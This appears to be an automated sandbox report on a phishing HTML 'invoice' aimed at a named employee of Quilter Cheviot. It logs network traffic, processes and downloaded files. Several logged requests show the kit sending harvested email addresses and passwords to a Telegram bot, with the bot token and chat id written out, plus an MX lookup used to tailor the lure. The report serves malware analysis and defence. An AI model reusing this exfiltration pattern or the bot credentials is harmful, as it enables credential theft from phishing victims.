      Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
      Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
      Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
      Source: unknownHTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.16:49696 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.16:49700 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.16:49709 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 217.114.85.70:443 -> 192.168.2.16:49697 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 217.114.85.70:443 -> 192.168.2.16:49701 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.16:49710 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.16:49711 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 217.114.85.70:443 -> 192.168.2.16:49708 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 217.114.85.70:443 -> 192.168.2.16:49712 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.138.106.26:443 -> 192.168.2.16:49714 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.138.106.63:443 -> 192.168.2.16:49715 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.14.68:443 -> 192.168.2.16:49716 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 8.8.4.4:443 -> 192.168.2.16:49728 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 8.8.8.8:443 -> 192.168.2.16:49729 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.16:49730 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.16:49731 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 217.114.85.70:443 -> 192.168.2.16:49739 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 217.114.85.70:443 -> 192.168.2.16:49740 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.18.35.231:443 -> 192.168.2.16:49742 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 173.222.103.192:443 -> 192.168.2.16:49749 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.17.25.14:443 -> 192.168.2.16:49748 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.64.152.25:443 -> 192.168.2.16:49754 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.64.152.25:443 -> 192.168.2.16:49755 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.67.8.54:443 -> 192.168.2.16:49757 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 13.107.246.40:443 -> 192.168.2.16:49762 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.251.40.164:443 -> 192.168.2.16:49777 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.22.38.92:443 -> 192.168.2.16:49778 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.22.39.92:443 -> 192.168.2.16:49791 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 52.179.73.37:443 -> 192.168.2.16:49790 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 52.188.247.147:443 -> 192.168.2.16:49795 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.16:49805 version: TLS 1.2

      System Summary

      Source: Name includes: Invoice_charles.mesquita_PaymentUpdate.html | Initial sample: invoice
      Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File created: C:\Windows\SystemTemp\scoped_dir6292_1387746061
      Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File deleted: C:\Windows\SystemTemp\scoped_dir6292_1387746061
      Source: classification engine | Classification label: mal84.phis.troj.winHTML@22/35@48/294
      Source: unknown | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\Desktop\Invoice_charles.mesquita_PaymentUpdate.html
      Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2040,i,11913174507900724838,10422298326975698631,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2092 /prefetch:3
      Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
      Source: Window Recorder | Window detected: More than 3 window changes detected

      Stealing of Sensitive Information

      Source: file:///C:/Users/user/Desktop/Invoice_charles.mesquita_PaymentUpdate.html | HTTP Parser: file:///C:/Users/user/Desktop/Invoice_charles.mesquita_PaymentUpdate.html
      Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
      Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Windows Management Instrumentation | 1 Browser Extensions | 1 Process Injection | 1 Masquerading | OS Credential Dumping | System Service Discovery | Remote Services | Data from Local System | 1 Web Service | Exfiltration Over Other Network Medium | Abuse Accessibility Features
      Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 Extra Window Memory Injection | 1 Process Injection | LSASS Memory | Application Window Discovery | Remote Desktop Protocol | Data from Removable Media | 1 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
      Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 1 File Deletion | Security Account Manager | Query Registry | SMB/Windows Admin Shares | Data from Network Shared Drive | 3 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
      Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 Extra Window Memory Injection | NTDS | System Network Configuration Discovery | Distributed Component Object Model | Input Capture | 4 Application Layer Protocol | Traffic Duplication | Data Destruction
      Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | Software Packing | LSA Secrets | Internet Connection Discovery | SSH | Keylogging | 1 Ingress Tool Transfer | Scheduled Transfer | Data Encrypted for Impact

      No Antivirus matches
                                                    quiltercheviot.comSweden
                                                    30811EPISERVER_ASSEfalse
                                                    108.138.106.26
                                                    d26p066pn2w0s0.cloudfront.netUnited States
                                                    16509AMAZON-02USfalse
                                                    172.67.8.54
                                                    cc-cdn.civiccomputing.com.cdn.cloudflare.netUnited States
                                                    13335CLOUDFLARENETUSfalse
                                                    52.188.247.147
                                                    gig-ai-g-prod-eastus-6-app-v4-tag.eastus.cloudapp.azure.comUnited States
                                                    8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                    142.250.81.227
                                                    unknownUnited States
                                                    15169GOOGLEUSfalse
                                                    142.251.40.164
                                                    unknownUnited States
                                                    15169GOOGLEUSfalse
                                                    52.179.73.37
                                                    gig-ai-g-prod-eastus-7-app-v4-tag.eastus.cloudapp.azure.comUnited States
                                                    8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                    172.64.152.25
                                                    unknownUnited States
                                                    13335CLOUDFLARENETUSfalse
                                                    104.18.35.231
                                                    www.quiltercheviot.com.cdn.cloudflare.netUnited States
                                                    13335CLOUDFLARENETUSfalse
                                                    104.17.25.14
                                                    cdnjs.cloudflare.comUnited States
                                                    13335CLOUDFLARENETUSfalse
                                                    142.251.163.84
                                                    unknownUnited States
                                                    15169GOOGLEUSfalse
                                                    104.22.39.92
                                                    unknownUnited States
                                                    13335CLOUDFLARENETUSfalse
                                                    IP
                                                    192.168.2.16
                                                    192.168.2.6
                                                    Joe Sandbox version:42.0.0 Malachite
                                                    Analysis ID:1648028
                                                    Start date and time:2025-03-25 13:47:27 +01:00
                                                    Joe Sandbox product:CloudBasic
                                                    Overall analysis duration:
                                                    Hypervisor based Inspection enabled:false
                                                    Report type:full
                                                    Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                    Number of new started processes analysed:15
                                                    Number of new started drivers analysed:0
                                                    Number of existing processes analysed:0
                                                    Number of existing drivers analysed:0
                                                    Number of injected processes analysed:0
                                                    Technologies:
                                                    • EGA enabled
                                                    Analysis Mode:stream
                                                    Analysis stop reason:Timeout
                                                    Sample name:Invoice_charles.mesquita_PaymentUpdate.html
                                                    Detection:MAL
                                                    Classification:mal84.phis.troj.winHTML@22/35@48/294
                                                    Cookbook Comments:
                                                    • Found application associated with file extension: .html
                                                    • Exclude process from analysis (whitelisted): svchost.exe
                                                    • Excluded IPs from analysis (whitelisted): 142.250.64.110, 142.250.81.227, 142.251.163.84
                                                    • Excluded domains from analysis (whitelisted): clients2.google.com, accounts.google.com, clientservices.googleapis.com
                                                    • Not all processes were analyzed, report is missing behavior information
                                                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                    • VT rate limit hit for: file:///C:/Users/user/Desktop/Invoice_charles.mesquita_PaymentUpdate.html
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:JSON data
                                                    Category:downloaded
                                                    Size (bytes):709
                                                    Entropy (8bit):5.21674145000545
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:D56453CBCD80C8A34EB7C77F124947C4
                                                    SHA1:051E7E06B3522935F2455FF41A66691127F39C2E
                                                    SHA-256:744352E890EC6B71E88EC803A3A3976F27BD545D584454F8C32A04C6E37AC1ED
                                                    SHA-512:5FE11022E0BA838F3E852C1F594E0BFB0610BA9F9724D0E1F1069CCDE25003D281448EB1BAE495C4AD9C576F975E8E7BF9749461AE85259324E50997FF377785
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://api.telegram.org/bot6800467599:AAGHIthuSv3CWGlzgsGIwx9GWQJ2OnFzEfE/sendMessage?chat_id=6522132099&text=%F0%9F%94%B9%20First%20Password%20Attempt%20%F0%9F%94%B9%0A%0A%F0%9F%93%A7%20Email%3A%20charles.mesquita%40quiltercheviot.com%0A%F0%9F%94%91%20Password%201%3A%20hAhAhA%0A%F0%9F%8C%8D%20IP%3A%20161.77.13.20%0A%F0%9F%8F%B3%EF%B8%8F%20Country%3A%20US%0A%F0%9F%94%97%20Login%20URL%3A%20https%3A%2F%2Fmail.mxa-0036ff01.gslb.pphosted.com
                                                    Preview:{"ok":true,"result":{"message_id":632,"from":{"id":6800467599,"is_bot":true,"first_name":"US Unlimited","username":"usunlimitedbot"},"chat":{"id":6522132099,"first_name":"\"Olk","type":"private"},"date":1742906920,"text":"\ud83d\udd39 First Password Attempt \ud83d\udd39\n\n\ud83d\udce7 Email: charles.mesquita@quiltercheviot.com\n\ud83d\udd11 Password 1: hAhAhA\n\ud83c\udf0d IP: 161.77.13.20\n\ud83c\udff3\ufe0f Country: US\n\ud83d\udd17 Login URL: https://mail.mxa-0036ff01.gslb.pphosted.com","entities":[{"offset":40,"length":35,"type":"email"},{"offset":105,"length":12,"type":"url"},{"offset":148,"length":43,"type":"url"}],"link_preview_options":{"url":"https://mail.mxa-0036ff01.gslb.pphosted.com/"}}}
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:JSON data
                                                    Category:downloaded
                                                    Size (bytes):363
                                                    Entropy (8bit):4.951150844104779
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:6F31661D79688ED2BF5CD163636F746F
                                                    SHA1:98CE809ECBCBEAFA6A24C37B6B197019B4A3C265
                                                    SHA-256:0A9D6B5229DA550F148AE62A686D38BE56277393005E2075980F28C9CE010F48
                                                    SHA-512:D0B9AFD7636F4EDFA83E523670DAED905D31D8C942D7E9E99C7F14575A1A8BA37832355DEEA29A842AF400414069B98E2192EB05E318FB5BDF14CF9D75D92974
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://dns.google/resolve?name=quiltercheviot.com&type=MX
                                                    Preview:{"Status":0,"TC":false,"RD":true,"RA":true,"AD":false,"CD":false,"Question":[{"name":"quiltercheviot.com.","type":15}],"Answer":[{"name":"quiltercheviot.com.","type":15,"TTL":300,"data":"10 mxa-0036ff01.gslb.pphosted.com."},{"name":"quiltercheviot.com.","type":15,"TTL":300,"data":"10 mxb-0036ff01.gslb.pphosted.com."}],"Comment":"Response from 156.154.131.100."}
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 539x520, components 3
                                                    Category:downloaded
                                                    Size (bytes):65679
                                                    Entropy (8bit):7.981690066948687
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:325E39DE3D6BBD07B2B94A19641A4940
                                                    SHA1:EDEF679732EAE5CA69C951D080543671F219CD27
                                                    SHA-256:10514061ED7D3693B1315C4D1F280B453B41DCCA3DB5090FC54B9F0B2D2F225C
                                                    SHA-512:ABE953AC3D3C02431F96CA6F0275930301D8EE685AF0598793BA7D8D1D880CD439E182D3DA4C0A92D8DDE36855A13BCD1093676F8F6C1C45E4D3B6E287809E6D
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://www.quiltercheviot.com/4ad700/siteassets/imagery/hero-banners/customer-homepage-hero-banner.jpg?width=539&height=520&quality=70&rmode=crop&format=jpeg
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:SVG Scalable Vector Graphics image
                                                    Category:downloaded
                                                    Size (bytes):29028
                                                    Entropy (8bit):3.8083675359871645
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:131B92812BEB10216EB5680BF0CB2682
                                                    SHA1:A8C0D68A26F425CC7EC19344D2E52BB9605295C0
                                                    SHA-256:C06C49EFB8AD27B17AAC7DD45E9DA908DD78CCD01D1F424AC0EB37442FB2968B
                                                    SHA-512:CD7702860F277DEE7616D9ADB648A876BD06EDFC4CE8B30D9EB731DEDA0559BD09164B0B6241282DEF291DD462ED382540DAA786575237285D8B52324A65F77B
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://www.quiltercheviot.com/4ad25c/globalassets/logos/qc-logos/qc_primary_logo_stkdleft1_rgb72.svg
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:JSON data
                                                    Category:dropped
                                                    Size (bytes):3011
                                                    Entropy (8bit):5.157932323020014
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:4ECA5DD7BAE0EF637008C92E3C8C18E4
                                                    SHA1:C2E651B4E9BFB81597CF4FFFA8E25E7266B27CB0
                                                    SHA-256:5DDD48886518017D106975B744772B0BFB0191E8A4D63FDD33D233D8294B416F
                                                    SHA-512:766C83937D8550A4076F428C82D3DABF347A3A3C25A79C3FAE600D348AF84E3B3315CAA280E5B83BC0887439C7B09FE9A64E05164680D2D4EB563358FF860379
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:{"UserRoles":[{"RoleId":"pc","RoleName":"Private Client","Regions":[{"Id":"uk","RegionName":"United Kingdom","DisplayPrompt":false,"RegionUrl":"?Region=uk&Role=pc"},{"Id":"je","RegionName":"Jersey","DisplayPrompt":false,"RegionUrl":"?Region=je&Role=pc"},{"Id":"dub","RegionName":"Dubai","DisplayPrompt":false,"RegionUrl":"?Region=dub&Role=pc"},{"Id":"eur","RegionName":"Europe","DisplayPrompt":false,"RegionUrl":"?Region=eur&Role=pc"}]},{"RoleId":"fadv","RoleName":"Financial Adviser","Regions":[{"Id":"uk","RegionName":"United Kingdom","DisplayPrompt":false,"RegionUrl":"?Region=uk&Role=fadv"},{"Id":"je","RegionName":"Jersey","DisplayPrompt":false,"RegionUrl":"?Region=je&Role=fadv"},{"Id":"dub","RegionName":"Dubai","DisplayPrompt":false,"RegionUrl":"?Region=dub&Role=fadv"},{"Id":"eur","RegionName":"Europe","DisplayPrompt":false,"RegionUrl":"?Region=eur&Role=fadv"}]},{"RoleId":"char","RoleName":"Charity or professional trustee","Regions":[{"Id":"uk","RegionName":"United Kingdom","DisplayPromp
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:PNG image data, 512 x 512, 8-bit/color RGBA, non-interlaced
                                                    Category:dropped
                                                    Size (bytes):16926
                                                    Entropy (8bit):7.8943670233750565
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:E6346E60EF82589B0BE4F4B5E8C12DDE
                                                    SHA1:05770DE24E7ED9F8660C68B756A7FA8962600105
                                                    SHA-256:3306E3ABB9C6B0723973502AEDA44A3130F7591F5B161612B40640BA2616154E
                                                    SHA-512:82D42CFFCA5AC73D32AEEE17738613BC1E771430B0B4F15AAAE79A3ED8C45A339DD4F294B7F92A7B4B299B46CBF2BF802043150B0151BE4F7DC79B2EFBA79BA7
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 270x260, components 3
                                                    Category:downloaded
                                                    Size (bytes):19266
                                                    Entropy (8bit):7.973747930575571
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:4D4C4CD117296033DEBF319EF5752DC2
                                                    SHA1:FCAEDCC388B2785815A9A154D5FABA0F7981DEBE
                                                    SHA-256:BA0535AE12BCCF776A9C9C5EC0CBCFB20B0CF997DACE5B35E4BD6D36A74B61B5
                                                    SHA-512:00EDB0237C5CD514E96F29684773DADBA5E3FBF71686B3BB28CF6D5BEB45326CB2AECE97D4950581EC171DC675D3E3234709DB5EC7DB8AF854765090D2FB20F8
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://www.quiltercheviot.com/4ad700/siteassets/imagery/hero-banners/customer-homepage-hero-banner.jpg?width=270&height=260&quality=20&rmode=crop&format=jpeg
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:SVG Scalable Vector Graphics image
                                                    Category:downloaded
                                                    Size (bytes):28988
                                                    Entropy (8bit):3.8393499464288503
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:CE8300E18DBB55F427CEADFC9650D926
                                                    SHA1:A531D9144FD15A183F2205949777D6D87807E89F
                                                    SHA-256:18517B8305CD6D6F59F99316B4B211D779AD197E0D5ABF6644A623E9BC43EF97
                                                    SHA-512:A84055E771CC4AA7EFC24FD8E9CE276F39441BC8B966731E35D8A8E36E9D9035CFADDFF357615302970ED9A93304A667F8C0E700B2B8E1FC86D1F2216D458F54
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://www.quiltercheviot.com/4ad25c/globalassets/logos/qc-logos/qc-secondary-logo.svg
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:HTML document, ASCII text, with very long lines (815)
                                                    Category:downloaded
                                                    Size (bytes):3501
                                                    Entropy (8bit):5.383873370647921
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:147FD3B00C22BA9C939712E9213C24CA
                                                    SHA1:3B48369B86FA0574F35379AACD1F42CC9C98A52B
                                                    SHA-256:70F5B11C1870CF90201A6D5F770CA318A3FA5827C74A8765EDE22B487F7D4532
                                                    SHA-512:E8419A71232EDAC8FD131446777F7D034B3171EFE07B3267479B439E4982650DB65A0D1DDC9F516315D5ED1B01ECFD2F7EB55D75D44AA51EE0AD494D441586D2
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://www.googletagmanager.com/static/service_worker/53k0/sw_iframe.html?origin=https%3A%2F%2Fwww.quiltercheviot.com
                                                    Preview:<!DOCTYPE html>.<html>.<head>. <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon">.</head>.<body>. <script>.'use strict';class m{constructor(a){this.j=a;this.g={};this.h={};this.i=0;this.id=String(Math.floor(Number.MAX_SAFE_INTEGER*Math.random()))}}function n(a){return a.performance&&a.performance.now()||Date.now()}.var p=function(a,b){class d{constructor(c,g,f){this.failureType=c;this.data=g;this.g=f;this.h=new m(n(f))}s(c,g){const f=c.clientId;if(c.type===0){c.isDead=!0;var e=this.h,h=n(this.g);e.g[f]==null&&(e.g[f]=0,e.h[f]=h,e.i++);e.g[f]++;c.stats={targetId:e.id,clientCount:e.i,totalLifeMs:Math.round(h-e.j),heartbeatCount:e.g[f],clientLifeMs:Math.round(h-e.h[f])}}c.failure={failureType:this.failureType,data:this.data};g(c)}}return new d(5,a,b)};/*.. Copyright Google LLC. SPDX-License-Identifier: Apache-2.0.*/.let q=globalThis.trustedTypes,r;function t(){let a=null;if(!q)return a;try{const b=d=>d;a=q.createPolicy("goog#html",{createHTML:b,createScript:b,crea
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:downloaded
                                                    Size (bytes):16
                                                    Entropy (8bit):3.625
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:E5288F1AD2850958B9D5E49037527724
                                                    SHA1:3347F513C60032F28B3299ED4B8D3081767FE2BB
                                                    SHA-256:0C7ED200DF9208B55041146A6668F0C16526A845AF7A65B727AC7E4FA3358007
                                                    SHA-512:95ED214F562953FE4ADFA65850A71B288E7A61F558379B7CF75E380461B42D1B28478BBFA62AED005A6D589108330CBD7C5ED0143452D70C683FD07280D8AA43
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://content-autofill.googleapis.com/v1/pages/ChRDaHJvbWUvMTM0LjAuNjk5OC4zNhIZCd_JJV8jseCfEgUNfoomCiEsrxsJoXPWhQ==?alt=proto
                                                    Preview:CgkKBw1+iiYKGgA=
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:HTML document, ASCII text, with very long lines (3972), with CRLF, LF line terminators
                                                    Category:downloaded
                                                    Size (bytes):89057
                                                    Entropy (8bit):4.520818774780661
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:30221039B3A8597F647C1464FF8B26A5
                                                    SHA1:404D0E450BC0D705C48515194D4E82BAA87B519C
                                                    SHA-256:CF9916C5B5561D248C7FF2B18888DB7C25D0C90F2CEF3A73AA9D3364BC417530
                                                    SHA-512:AC63D81ACA797405D4CE289D5C2A6577B963CBD862239F9CA554F285BD6AB97A8042B2D83868A03E03F3B19FB2B74177F4D887403D617ABA8F4357E3B891E028
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://www.quiltercheviot.com/
                                                    Preview:...<!DOCTYPE html>..<html lang="en">.<head>. <meta charset="utf-8">. <meta http-equiv="x-ua-compatible" content="ie=edge">.. <title>Quilter Cheviot</title>.. <meta name="viewport" content="width=device-width, initial-scale=1">. <meta name="description" content="Quilter Cheviot have been helping clients to help grow and preserve their wealth for over 250 years. Discover more about who we are and the services we offer." />. <meta name="robots" content="INDEX, FOLLOW" />. Open graph -->. <meta property="og:title" content="Quilter Cheviot">. <meta property="og:type" content="website">. <meta property="og:description" content="Quilter Cheviot have been helping clients to help grow and preserve their wealth for over 250 years. Discover more about who we are and the services we offer.">. <meta property="og:site_name" content="www.quiltercheviot.com">. <meta property="og:locale" content="en-US">.... <meta property="fb:app_id" content="18515031650
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:SVG Scalable Vector Graphics image
                                                    Category:dropped
                                                    Size (bytes):200
                                                    Entropy (8bit):5.0207274619676845
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:06967FFBF782D5107BC19AAB9777C1F5
                                                    SHA1:F0A1CB4E3AEE2FB9F0AB6372BBE7E260F0D62735
                                                    SHA-256:5CAA792217F57C62B3AAF8150C06204CD9DF01F9284306A23B383A572BCB0512
                                                    SHA-512:1DC0E6FF51D0A75ED401EB3694DCE61CE226EA15D4B00C04766FE5BF0FDAEF3D509B96DB9F50445B9C6FE355757FB463BFE02A9AD1E701E77DC6B34FFCC5811C
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:<svg width="13" height="13" viewBox="0 0 13 13" fill="none". xmlns="http://www.w3.org/2000/svg">. <path d="M5.65576 12L11.3126 6.34315L5.65576 0.686292" stroke="#ffffff" stroke-width="1.5"/>.</svg>.
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:JSON data
                                                    Category:dropped
                                                    Size (bytes):709
                                                    Entropy (8bit):5.215151865889006
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:49E466420DBA4D3B00FF5C23D9019FC2
                                                    SHA1:87BE82AEA1EBB4D36974B422910DBB4C966F5E92
                                                    SHA-256:A29662D0B97927CAF660862537BAE13D96FB7CECF008628EB11FD89195E328CE
                                                    SHA-512:30E86286E5856DEE9745F7FB25535A7EDAD9E90AB2C443FE3D6BBADA0FFF56BA33661D509538D4080C57E6C1C88351CA7C35F55FABEAF36451874C84B15BB072
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:{"ok":true,"result":{"message_id":633,"from":{"id":6800467599,"is_bot":true,"first_name":"US Unlimited","username":"usunlimitedbot"},"chat":{"id":6522132099,"first_name":"\"Olk","type":"private"},"date":1742906921,"text":"\ud83d\udd39 First Password Attempt \ud83d\udd39\n\n\ud83d\udce7 Email: charles.mesquita@quiltercheviot.com\n\ud83d\udd11 Password 1: hAhAhA\n\ud83c\udf0d IP: 161.77.13.20\n\ud83c\udff3\ufe0f Country: US\n\ud83d\udd17 Login URL: https://mail.mxa-0036ff01.gslb.pphosted.com","entities":[{"offset":40,"length":35,"type":"email"},{"offset":105,"length":12,"type":"url"},{"offset":148,"length":43,"type":"url"}],"link_preview_options":{"url":"https://mail.mxa-0036ff01.gslb.pphosted.com/"}}}
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:JSON data
                                                    Category:downloaded
                                                    Size (bytes):744
                                                    Entropy (8bit):5.25165212413263
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:AAC406B67EB6BBBAE50FFDC5A0CD9E1E
                                                    SHA1:2C2ED5AF08765FA1B6D9E46A0990E9C410D59EB2
                                                    SHA-256:7FB3DAE66DCCB30D330E7F9689FFDC451BD7FAB9500F3CE6E54F0176E31DC292
                                                    SHA-512:F59EEAEB8D3B9B2829790611D9BE5BB01BEDB35B65E6172D0810EAD3B84419525EF0CA73C8DBB47CCE1F30A8D24A0108AC91320E99156B754E8E69E611CB1357
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://api.telegram.org/bot6800467599:AAGHIthuSv3CWGlzgsGIwx9GWQJ2OnFzEfE/sendMessage?chat_id=6522132099&text=%F0%9F%94%B9%20Second%20Password%20Attempt%20%F0%9F%94%B9%0A%0A%F0%9F%93%A7%20Email%3A%20charles.mesquita%40quiltercheviot.com%0A%F0%9F%94%91%20Password%201%3A%20hAhAhA%0A%F0%9F%94%91%20Password%202%3A%20RUBBISH%0A%F0%9F%8C%8D%20IP%3A%20161.77.13.20%0A%F0%9F%8F%B3%EF%B8%8F%20Country%3A%20US%0A%F0%9F%94%97%20Login%20URL%3A%20https%3A%2F%2Fmail.mxa-0036ff01.gslb.pphosted.com
                                                    Preview:{"ok":true,"result":{"message_id":634,"from":{"id":6800467599,"is_bot":true,"first_name":"US Unlimited","username":"usunlimitedbot"},"chat":{"id":6522132099,"first_name":"\"Olk","type":"private"},"date":1742906941,"text":"\ud83d\udd39 Second Password Attempt \ud83d\udd39\n\n\ud83d\udce7 Email: charles.mesquita@quiltercheviot.com\n\ud83d\udd11 Password 1: hAhAhA\n\ud83d\udd11 Password 2: RUBBISH\n\ud83c\udf0d IP: 161.77.13.20\n\ud83c\udff3\ufe0f Country: US\n\ud83d\udd17 Login URL: https://mail.mxa-0036ff01.gslb.pphosted.com","entities":[{"offset":41,"length":35,"type":"email"},{"offset":129,"length":12,"type":"url"},{"offset":172,"length":43,"type":"url"}],"link_preview_options":{"url":"https://mail.mxa-0036ff01.gslb.pphosted.com/"}}}
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (64728)
                                                    Category:downloaded
                                                    Size (bytes):212804
                                                    Entropy (8bit):6.018699593769891
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:34F7E53CA178D4DADD84D4763B964BDB
                                                    SHA1:D4EC7AFD1438FC9F8BD26444F58395D03DFAFAC0
                                                    SHA-256:A309CCEF3111D30D2EAFBB8D3244768E9540D25441F7AF565B7E083E323A39B7
